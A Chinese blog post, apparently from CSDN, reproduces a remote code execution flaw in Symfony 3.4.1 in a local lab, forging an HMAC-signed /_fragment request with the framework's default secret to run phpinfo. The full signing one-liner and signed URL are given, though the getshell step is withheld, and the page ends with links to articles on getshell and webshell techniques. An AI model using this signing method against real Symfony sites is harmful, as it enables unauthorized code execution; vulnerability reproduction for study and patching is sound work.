不知几DAY的Symfony---RCE复现

于 2024-07-01 09:51:25 发布
阅读量564 收藏 3
点赞数 5
分类专栏: web安全评估 红队 文章标签: symfony android php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48421613/article/details/140092615
版权

感谢红队大佬老流氓的供稿,此篇文章是针对Symfony框架的一个RCE漏洞复现

​框架简介
Symfony是一个开源的PHP Web框架,它现在是许多知名 CMS 的核心组件,例如Drupal、Joomla!、eZPlatform(以前称为 eZPublish)或Bolt。该框架在低版本时使用了默认密钥,从而造成RCE。
Symfony 的内置功能之一是类,用于处理ESI(Edge-Side Includes)。本质上,当有人向发出请求时,此侦听器会根据给定的 GET 参数设置请求属性。由于这允许运行任意 PHP 代码(稍后会详细介绍),因此必须使用 HMAC 值对请求进行签名。此 HMAC 的秘密加密密钥存储在名为的 Symfony 配置值下。
FragmentListener/_fragmentsecret

漏洞前提
版本高的时候攻击者需要拿到密钥(从文件备份等获取),低版本时为默认密钥(本地安装获即可得)。

环境安装
这里使用的是ubuntu16,安装的是Symfony 3.4.1,命令大致如下

sudo apt update
sudo apt install php-cli unzip
sudo apt-get update
sudo apt-get install php php-xml php-curl php-cli php-zip php-gd php-mysql
sudo apt-get install php php-xml php-curl php-cli php-zip php-gd php-mysql -y
composer create-project symfony/framework-standard-edition my_project_name 3.4.1
apt install composer -y
composer create-project symfony/framework-standard-edition my_project_name 3.4.1
sudo apt-get install --reinstall ca-certificates
composer create-project symfony/framework-standard-edition my_project_name 3.4.1
sudo apt update
sudo apt install php-cli unzip
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
php composer-setup.php --install-dir=/usr/local/bin --filename=composer
php -r "unlink('composer-setup.php');"
composer create-project symfony/framework-standard-edition my_project_name 3.4.1
cd my_project_name
composer install
sudo chmod +x bin/console

启动环境
php bin/console server:run 0.0.0.0:8000 在本机的8000端口开启监听
在这里插入图片描述
在这里插入图片描述

​漏洞复现
密钥: APP_SECRET is ThisTokenIsNotSoSecretChangeIt 安装的时候可以看见

生成签名,执行phpinfo函数

page="http://xx.xx.xx.xx:8000/_fragment?_path=_controller%3Dphpinfo%26what%3D-1"
python -c "import base64, hmac, hashlib; print(base64.b64encode(hmac.HMAC(b'ThisTokenIsNotSoSecretChangeIt', b'$page', hashlib.sha256).digest()))"

在这里插入图片描述

拼接路径
注意如果生成的签名里面有+号等特殊符号需要进行url编码,完整url如下:

http://xx.xx.xx.xx:8000/_fragment?_path=_controller%3Dphpinfo%26what%3D-1&_hash=1AojZEyRdQcbIw/hIIukPuOfCbj8tuYrKg0sCPJBWDE=

Getshell部分就不发了,那个就是佬的辛勤研究成果了,请大家给老流氓点赞

​复现难点
如何获取每个函数的使用方法、寻找可getshell的函数。注意编码问题,如果访问拼接的url提示403则签名有问题,可能是有符号没有编码或函数参数有问题

参考文章
链接1: https://www.ambionics.io/blog/symfony-secret-fragment
链接2: https://medium.com/@bxrowski0x/3-symfony-rce-a-peek-behind-the-curtain-83da5433e149

vlan911
关注
  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
oracleshell执行新医保数据转换后台
viviliving的专栏
03-20 239
select LinxRUNCMD('/data05/sql/exec.sh /data05/sql/test.sql') cmd from dual; exec.sh #!/usr/bin/bash source ~/.bash_profile echo $1 date>$1.log /usr/bin/nohup /u01/app/oracle/product/12.1.0/db_1/bin/sqlplus hsa_lzjbsi/hsa_lzjbsi@192.168.217.192/OR.
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4147
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
SQL注入-getshell
LJH1999ZN的博客
02-15 1万+
一、getshell的含义 1.什么是shell? Shell 是一个程序,提供一个用户与操作系统内核连接的环境。这个环境只有一个命令提示符,让用户从键盘输入命令,所以又称为命令行环境。 2.什么是webshell? WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执
探索Symfony的安全边界:symfony-exploits项目解析与应用
最新发布
gitblog_00068的博客
06-09 427
探索Symfony的安全边界:symfony-exploits项目解析与应用 项目地址:https://gitcode.com/ambionics/symfony-exploits 1、项目介绍 在软件开发的世界中,安全是不容忽视的一环,尤其是对于广泛使用的PHP框架如Symfony而言。symfony-exploits 是一个专注于研究和收集针对Symfony框架潜在安全漏洞的开源项目。它为开发...
Symfony 2 历史漏洞(选择版本的依据)
soldi_er的博客
10-21 3001
文章目录Symfony 历史漏洞百度检索CVE批量搜索CVE-看这个就行了Symfony 2 历史漏洞 Symfony 历史漏洞 百度检索CVE CVE-2021-21424: Prevent user enumeration in authentication mechanisms CVE-2020-15094 PHP模板引擎的跳脱验证讯息CVE-2019-10909、验证服务ID有效性CVE-2019-10910以及Cookie杂凑的问题CVE-2019-10911 CVE-2018-14773 CVE
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2313
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
symfony-bundle:Symfony集成翻译
05-03
翻译套件 用于PHP翻译的Symfony集成安装通过Composer安装此捆绑包: $ composer require php-translation/symfony-bundle 如果您使用的是 ,那就大功告成! Symfony Flex将为您创建默认配置,如有需要,请进行更改。...
symfony-micro:Symfony微型应用
02-06
symfony-micro 基于\Symfony\Bundle\FrameworkBundle\Kernel\MicroKernelTrait Symfony微型应用程序包含什么Symfony v3.0。* 教义2.5 发电机组威基字体真棒用法建立专案composer create-project cawakharkov/symfony...
symfony-clean-tags-composer-plugin
02-06
Symfony Clean Tags Composer插件动机最近发,Composer在具有很多历史标记的程序包上消耗大量CPU +内存。 参见 这意味着composer + packagist基础结构存在可伸缩性问题:随着时间的流逝,每个软件包的标签列表会...
symfony-bundle:永旺Symfony捆绑包
03-29
永旺 ...“ aeon / ˈiːɒn /”一词也被拼写为“ eon”(在美式英语中),最初的意思是“生命”,“生命力”或“存在”,“世代”或“一段时间”,尽管它往往被翻译为“年龄”的意思是“年龄”,“永远”,“永恒”或...
symfony-storage
03-27
Symfony存储 这是一个使用...安装composer require php-translation/symfony-storage测验通过运行以下命令进行静态代码分析(修代码样式,并使用PHPStan进行测试): make static文献资料阅读我们的文档,为 。
sf2-profiler-exploit:Symfony2 <2.5.4漏洞利用探查器
05-06
Symfony2 <2.5.4探查器漏洞 此漏洞利用了Symfony2的Web事件探查器的功能,该功能允许任何人注入和解释SQL查询。 例子: $ python sf2-profiler-sqli.py --url http://localhost/ --table example_user --columns id,username,password 上面的示例提取每个example_user表记录的id ,用户名和密码,并显示其内容。 更多信息
getshell思路
Bu2n的博客
02-23 5711
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCE getshell总结 授人以鱼,不如授人以渔 getshell能干嘛 1.执行终端命令 2.文件管理(增删改查) 3.数据管理(增删改查,前提找到root用户密码) 文件上传getshell 网站有上传点,最容易getshell。 直接上传一个一句话木马,然后使用webshell管理工具,就能成功getshell 如果web应用对上传文件的文件进行过滤,要想办法绕.
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1418
getshell之后的提权
后台getshell常用技巧
热门推荐
黑面狐
04-03 1万+
1.利用文件上传漏洞,找文件上传处想办法上传php文件。 一些网站在设置可以允许修改上传的文件类型则直接添加php 有时候会还有检测是否为php文件,可以通过文件名变形,大小写,双写等形式绕过,只要是黑名单的都比较好绕过 很多cms还有.hatccess文件禁止访问或者执行这个目录下的文件的情况 这种情况直接上传一个.hatccess文件覆盖这个,让其失效。 或者上传不重命名的...
Symfony
ylnzzl的博客
08-26 437
目录 安装 简言 实例 安装 本次安装环境是 Windows8.1操作系统 + php V7.3.12 。 安装Symfony CLI成功后,就可以通过symfony命令安装Symfony应用、启动本地网络服务器、检查依赖项的安全漏洞。 如果安装Symfony CLI不成功,这时还可以用Composer方式安装Symfony应用。 Composer方式安装Symfony简述如下。 命令行界面切换到网站目录下,然后运行: composer create-project symfony/
php如何用菜刀连接getshell,菜刀(代码执行)函数和命令执行函数详解及Getshell方法...
weixin_29730445的博客
03-16 895
@$temp = $_FILES['upload_file']['tmp_name'];@$file = basename($_FILES['upload_file']['name']);if (empty ($file)){echo "\n";echo "Local file: \n";echo "\n";echo "\n\n\n";}else {if(move_uploaded_file($t...
redis未授权getshell四种方式
BING
04-24 4270
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
getshell方法总结
tell_me_404的博客
03-09 3718
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 ...
thinkphp5.1 think-queue
07-08
ThinkPHP 5.1中的`think-queue`是一个用于处理队列任务的扩展包。它基于`Symfony Queue`组件,可以帮助你实异步任务处理、延迟任务执行等功能。 要使用`think-queue`,首先需要安装该扩展包。可以通过Composer进行安装: ``` composer require topthink/think-queue ``` 安装完成后,需要进行一些配置。在ThinkPHP 5.1中,你需要在`config/queue.php`文件中进行相关配置,包括设置队列驱动、连接信息等。 配置示例: ```php return [ // 默认使用的队列驱动 'default' => 'redis', // 队列连接信息 'connections' => [ 'redis' => [ 'driver' => 'redis', 'host' => '127.0.0.1', 'port' => 6379, 'password' => '', 'queue' => 'default', 'expire' => 60, ], ], ]; ``` 配置完成后,你可以定义自己的队列任务。在ThinkPHP 5.1中,可以通过继承`think\queue\Job`类来定义任务,并实`handle()`方法来处理具体的任务逻辑。 任务示例: ```php namespace app\job; use think\queue\Job; class MyJob { public function handle(Job $job, $data) { // 处理任务逻辑 // 完成任务 $job->delete(); } } ``` 定义完任务后,可以使用队列的`push()`方法将任务推送到队列中: ```php use think\Queue; // 推送任务到队列 Queue::push('app\job\MyJob', $data, 'queue_name'); ``` 以上是简单的`think-queue`使用示例。你可以根据自己的需求,进一步配置和使用该扩展包。 希望能帮到你!如果还有其他问题,请继续提问。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值